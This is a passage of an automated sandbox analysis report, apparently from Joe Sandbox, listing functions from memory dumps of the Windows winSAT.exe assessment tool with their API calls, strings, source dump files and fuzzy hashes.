                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID: Line %ld Col %ld%s$base\winsat\mlib\mxmldom.cpp$cannot add a reference$cannot add data to a collection$cannot create an IXMLDOMSchemaCollection object$cannot obtain the parsing error$cannot prarse XML%s$cannot query interface$cannot validate
                                                                                                                                                                                              • API String ID: 542301482-547904174
                                                                                                                                                                                              • Opcode ID: 43ceb852004110f727d426d82a36e942bca8109bcbbda124142c9d631394da0d
                                                                                                                                                                                              • Instruction ID: 81d9d31172f74fe0454f0f1754dd76aaad674cf89ecf81ca0a8f189a22d49eb8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 43ceb852004110f727d426d82a36e942bca8109bcbbda124142c9d631394da0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB12A36B08B0589EB109F65E8402ADB374FB88B98FA48236EE4D57BA4DF38D555C710
                                                                                                                                                                                              Function 00007FF780FAFB80 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast$EnvironmentExpandStrings
                                                                                                                                                                                              • String ID: %WINDIR%$%s\%s$%s\%s\%s$Performance$Performance\WinSAT\DataStore$WinSAT
                                                                                                                                                                                              • API String ID: 2004501331-642655616
                                                                                                                                                                                              • Opcode ID: df88417ab9d29162ffad2b92d4f8ac0863e3e6005e496ffa4c86ff66db028cb3
                                                                                                                                                                                              • Instruction ID: 06cf58c3cf89837a5e0c717af8338a8fc130777f2e567435e5782ef64deacb74
                                                                                                                                                                                              • Opcode Fuzzy Hash: df88417ab9d29162ffad2b92d4f8ac0863e3e6005e496ffa4c86ff66db028cb3
                                                                                                                                                                                              • Instruction Fuzzy Hash: FA417525B18B4387E720AB66E8402AAF7A4FF84754FE09132DA8DC6254DF7CE509C760
                                                                                                                                                                                              Function 00007FF780F98470 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 172COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$System$EnabledEventMetrics__uncaught_exception$CountCurrentFindHandleLoadLockModulePowerProcessSizeofStatusTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: can't run '%S' assessment via a remote session$ERROR: the system transitioned from battery power during the assessment: assessment=%S$ERROR: the system transitioned to a terminal server session during a formal assessment$ERROR: the system transitioned to battery power during the formal assessment: assessment=%S$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 161303124-862004072
                                                                                                                                                                                              • Opcode ID: 00c3195bf1a61da81628a049c3b602dedfc2ebf5c1cd40469d2153e41b6ffa58
                                                                                                                                                                                              • Instruction ID: 27c602fe4716ebff2f35210054dc7ed3b0fd252e90bac89ff2341fb72ed3872f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 00c3195bf1a61da81628a049c3b602dedfc2ebf5c1cd40469d2153e41b6ffa58
                                                                                                                                                                                              • Instruction Fuzzy Hash: D9813920E2C64392EB40FB11E8506F9A761BF80754FE89035D94E4A7E2DF6CF54AD720
                                                                                                                                                                                              Function 00007FF780FB0A18 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 170fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorExceptionFileLastThrow$CriticalLibrarySection__uncaught_exception$CloseCreateDeleteEnterFormatFreeHandleLeaveLoadMessageWritevswprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 745374605-1364133637
                                                                                                                                                                                              • Opcode ID: 253144313a1973b1b284c158e500e21499505b5ab2f041c2de68d93efb0a7a3a
                                                                                                                                                                                              • Instruction ID: e9945ac8db2811c6dcab0f244babb07ea9198fb147244da932f7eaae436048bc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 253144313a1973b1b284c158e500e21499505b5ab2f041c2de68d93efb0a7a3a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71813E32A18A4286EB50EF11E8543F9B760FB88B54FA09135EA5E477E5DF3CE505CB20
                                                                                                                                                                                              Function 00007FF780FA84C4 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 131COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception$memcpy
                                                                                                                                                                                              • String ID: first not in the string$last < first$last not in the string$pos1 is greater than length()
                                                                                                                                                                                              • API String ID: 3934552184-2820845001
                                                                                                                                                                                              • Opcode ID: 185596fd24bb44a60425fe79720201ac89a48016fbb072915ebaf0910e4a72b6
                                                                                                                                                                                              • Instruction ID: 29294d180896b0ee8bbf1401a8ebf713704760a4c341fc52896f43a0ff48cb28
                                                                                                                                                                                              • Opcode Fuzzy Hash: 185596fd24bb44a60425fe79720201ac89a48016fbb072915ebaf0910e4a72b6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E41A562B1894694EB10FF26E8515EDA321BF50B98FE09032ED0E577E6DE7CE506C360
                                                                                                                                                                                              Function 00007FF780FD5B78 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 112libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastLibrary$Load$AddressByteFormatFreeGlobalMemoryProcSizeStatus
                                                                                                                                                                                              • String ID: Kernel32.dll$Shlwapi.dll$StrFormatByteSizeEx
                                                                                                                                                                                              • API String ID: 1833532231-3817890669
                                                                                                                                                                                              • Opcode ID: 41c5829ca04459290f6c06ac673fb77b3f0d0e0954c02c68d4063c5228213510
                                                                                                                                                                                              • Instruction ID: 6aed7af76e8775df0ea9153e9a10205760eaa1df306a4cc7dd16411a52a6b7b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 41c5829ca04459290f6c06ac673fb77b3f0d0e0954c02c68d4063c5228213510
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D514136B19B42CAEB50AB61E85427CB7A0FB49B94FA44634CE0E57794DF38E406C750
                                                                                                                                                                                              Function 00007FF780FD6394 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 227fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffCharErrorLastLowermodf$CloseCreateFileHandlePathTemp
                                                                                                                                                                                              • String ID: %04d-%02d-%02d-%02d-%02d-%02d-%03d$%s\TempWinSAT-%s-%s.%s
                                                                                                                                                                                              • API String ID: 2799103058-528502101
                                                                                                                                                                                              • Opcode ID: 9fe77c6b2d995b4f592c3102be9808fa0fd74fc42f309802af686f318659fabc
                                                                                                                                                                                              • Instruction ID: 31d9d2281c8c88055186e650935fdbc136cf9a6fbcee1fab0fefa5abd9fa37c4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fe77c6b2d995b4f592c3102be9808fa0fd74fc42f309802af686f318659fabc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72B13A32B08A418AE710EF61E4402EDB770FB99B58F949231EE0E53799DF78E949C750
                                                                                                                                                                                              Function 00007FF780F9EE15 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 146synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$Close$EnabledEventExceptionHandleOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $ERROR: user does not have admin rights$PrivateError2
                                                                                                                                                                                              • API String ID: 111406061-3243825390
                                                                                                                                                                                              • Opcode ID: 0acbfb630d45b629315eb8cbe8a2d69ce9402be5e1f5027ae775700705efdccc
                                                                                                                                                                                              • Instruction ID: 3fb5d7dd92845651bfe2c1ad162d325ba46d21f225d1928fe9d88c1234673c16
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0acbfb630d45b629315eb8cbe8a2d69ce9402be5e1f5027ae775700705efdccc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C716F60E0D64395FB60BB11F8502BAEB50BF85788FF49035D94D027E6CEADB454CB60
                                                                                                                                                                                              Function 00007FF780F9EDE9 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 139synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $PrivateError2$cannot determine if user is running with administrative privileges
                                                                                                                                                                                              • API String ID: 3961399675-2860660824
                                                                                                                                                                                              • Opcode ID: 607eea4374e898ada0dbe54c8821f1809fec703a24034ef0fcf2f88213bb1745
                                                                                                                                                                                              • Instruction ID: 8bec5d25914d07581f045e1ffd2f31b119e74670bc4d938a00f8717b80def302
                                                                                                                                                                                              • Opcode Fuzzy Hash: 607eea4374e898ada0dbe54c8821f1809fec703a24034ef0fcf2f88213bb1745
                                                                                                                                                                                              • Instruction Fuzzy Hash: BB716D60E0D64395FB60BB11F8502BAEB50BF85788FF89035D54E027E6DEADB454CB60
                                                                                                                                                                                              Function 00007FF780F9F03D Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cannot process the command line$Cleanup and exit$ERROR: $PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-982402892
                                                                                                                                                                                              • Opcode ID: 2bac13b81cb5c1b7d55d708f8cff5ea305841f2e725cff64e2621fc26784d101
                                                                                                                                                                                              • Instruction ID: 504ffa9cd76283635a8321d4a7acbaf23bbec276246cf6c072cd6863305f9304
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bac13b81cb5c1b7d55d708f8cff5ea305841f2e725cff64e2621fc26784d101
                                                                                                                                                                                              • Instruction Fuzzy Hash: 55616E60E0D64395FB60BB11F8502BAEB50BF85788FF8A035D54E027E6DEADB454CB60
                                                                                                                                                                                              Function 00007FF780F97F70 Relevance: 18.3, APIs: 6, Strings: 6, Instructions: 273COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$__uncaught_exception$FindFolderHandleLoadLockModulePathSizeof
                                                                                                                                                                                              • String ID: > Curly Select Local File: '$> Curly: '$> using curly file bypass: '$base\winsat\exe\main.cpp$curlybypass$systemdisk
                                                                                                                                                                                              • API String ID: 423381991-3390790334
                                                                                                                                                                                              • Opcode ID: 15e10372140e8ff1170a69401313d9c3c6075a2d812467c865d4639b82699915
                                                                                                                                                                                              • Instruction ID: 0f90dd8c627871f789f318fe496857a36814e157dc817d50555c286662939728
                                                                                                                                                                                              • Opcode Fuzzy Hash: 15e10372140e8ff1170a69401313d9c3c6075a2d812467c865d4639b82699915
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6C17D21A1D64351EE54FB12E8505B9E760BF81784FE0A032EA4E47BE6DE6CF946C720
                                                                                                                                                                                              Function 00007FF780F9F43C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 167COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$ConsoleCtrlDirectoryErrorFindHandleHandlerLastLoadLockModuleRemoveSizeofUninitialize__uncaught_exception
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: can't run a formal assessment via a remote session$PrivateError2
                                                                                                                                                                                              • API String ID: 3376348566-3527664938
                                                                                                                                                                                              • Opcode ID: 806957c1cdfbe19cc49bc15214bf38871c6198b04fffc9fdf27d291722d6b06f
                                                                                                                                                                                              • Instruction ID: 52a5e622cad7312a5f4eb04a71c266906efb71bcf1ccc36be84ea2824553c3fd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 806957c1cdfbe19cc49bc15214bf38871c6198b04fffc9fdf27d291722d6b06f
                                                                                                                                                                                              • Instruction Fuzzy Hash: BD819061E0D68385FB60BB11B8502BAEB50BF85B88FF89035D94E037D2DEACB454C761
                                                                                                                                                                                              Function 00007FF780F9F4BF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 167COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$__uncaught_exception$ConsoleCtrlDirectoryErrorFindHandleHandlerLastLoadLockModuleRemoveSizeofUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: can't run a formal assessment on batteries$PrivateError2
                                                                                                                                                                                              • API String ID: 2060722394-1360525213
                                                                                                                                                                                              • Opcode ID: 6b6d311d38e9a8a7a05c859097639f652e3f8c63282c11b461ea1a2a93227059
                                                                                                                                                                                              • Instruction ID: e3d8a49da4ff4b153f5ad47890336f90735101899b536bd596cc808768277fff
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b6d311d38e9a8a7a05c859097639f652e3f8c63282c11b461ea1a2a93227059
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C819261E0D68395FB60BB11B8512BAEB50BF85B88FF89035D94E037D2DEACB454C721
                                                                                                                                                                                              Function 00007FF780FCE3AC Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 165fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$CriticalEnabledSectionWrite$CountCurrentEnterFileLeaveProcessTickTransfer_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: %06u (%04u) - %s:%04d:
                                                                                                                                                                                              • API String ID: 3916971103-2080362037
                                                                                                                                                                                              • Opcode ID: 373701af80b85a8867b7685fe5c703a8ac96a6eefa7927be171540c1080389cd
                                                                                                                                                                                              • Instruction ID: bb5da82056956805e45869224adebe8d0f1f33435faf4ff11962ea03eae354fc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 373701af80b85a8867b7685fe5c703a8ac96a6eefa7927be171540c1080389cd
                                                                                                                                                                                              • Instruction Fuzzy Hash: C9817262E08A9286E710AB14E8003B9BBA1FB55779FA48235D95D467D4DF7CE508CB20
                                                                                                                                                                                              Function 00007FF780FE1204 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 158comCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot create an IXMLDOMDocument2 document$cannot get the IXMLDOMNode interface for an XML document$cannot load XML data from a string$cannot set the 'preserve white space' flag
                                                                                                                                                                                              • API String ID: 542301482-1734626456
                                                                                                                                                                                              • Opcode ID: 9b9b1b826b38b2c68a065f29f3ab93cf1f7191afb49ddfb53c34544dcb2cf885
                                                                                                                                                                                              • Instruction ID: 85bd436c31d267d9826e46b924cdee9b8580be68bbe5ebbf9fdc68f1f98d82b9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b9b1b826b38b2c68a065f29f3ab93cf1f7191afb49ddfb53c34544dcb2cf885
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED61913261CB41C5E750DF26E8405A9B7A4FB89B94FA48236EE5E47B94DF3CE181C710
                                                                                                                                                                                              Function 00007FF780F9EFDD Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
